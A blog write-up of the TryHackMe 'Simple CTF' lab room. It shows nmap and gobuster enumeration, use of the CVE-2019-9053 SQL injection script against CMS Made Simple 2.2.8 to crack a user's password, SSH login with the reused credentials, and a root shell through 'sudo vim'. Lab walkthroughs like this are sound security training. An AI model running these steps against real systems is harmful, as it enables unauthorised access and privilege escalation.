TryHackMe

TryHackMe – Simple CTF

Room: https://tryhackme.com/room/easyctf

The past few days, I have been learning the actual details of cybersecurity from the All-In-One CompTIA PenTest+ Exam Guide by Ray Nutting.

Today we tackle the Simple CTF room and hopefully some of the concepts from the book will help me here again.

Enumeration

Port Scan

Always good to start a nmap scan: nmap -v -A 10.10.147.64. This nets us 3 ports:

  • 21/tcp – ftp – vsftpd 3.0.3
    • Anonymous FTP Login allowed
  • 80/tcp – http – Apache httpd 2.4.18 ((Ubuntu))
  • 2222/tcp- ssh – OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

Web Scan

We know that we have a web server on port 80, it just shows the default apache 2 Ubuntu page, we can run gobuster to find any useful information on the webserver

gobuster dir -u 10.10.147.64 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2021/03/29 16:16:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2021/03/29 16:16:18 Finished
===============================================================

The robots.txt and /simple, are interesting so let’s check them out in the browser.

In the robots.txt, it specifically specifies: Disallow: /openemr-5_0_1_3. Trying to navigate to this directory returns a not found error.

Navigating to /simple gives us a website powered by CMS Made Simple version 2.2.8

Vulnerability Search

First, let’s start with the application that we know is running, CMS Made Simple version 2.2.8:

searchsploit cms made simple 2.2.8
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection      | php/webapps/46635.py
---------------------------------------------- ---------------------------------

We get a hit! Navigating to this exploit in the browser, we see CVE-2019-9053 and we get a python script for cracking passwords. I copied the text into sublime editor, and saved it as ~/cve.py.

Now we just need to activate the script

python2 cve.py -u http://10.10.147.64/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e----
[+] Password cracked: <redacted>

Gaining Access

With one account pulled from the DB, we can try to see if this user is using the same credentials for multiple services, such as ssh: ssh mitch@10.10.147.64 -p2222, and he is! We have access now, so let’s look around.

  • We see a user.txt file in mitch’s home directory, we can cat that for a flag
  • cd .. reveals another user, sunbath
  • sudo -l reveals we have permission to run vim with no password
    • This is our entry point for PrivEsc, we can browse GTFOBins for syntax.

PrivEsc

Searching vim on GTFOBins nets this command for a root shell:

sudo vim -c ':!/bin/sh'

Now with our shell as root, which we can verify by running whoami, we can cd /root and cat the root.txt file in the directory!

Leave a Reply

Your email address will not be published. Required fields are marked *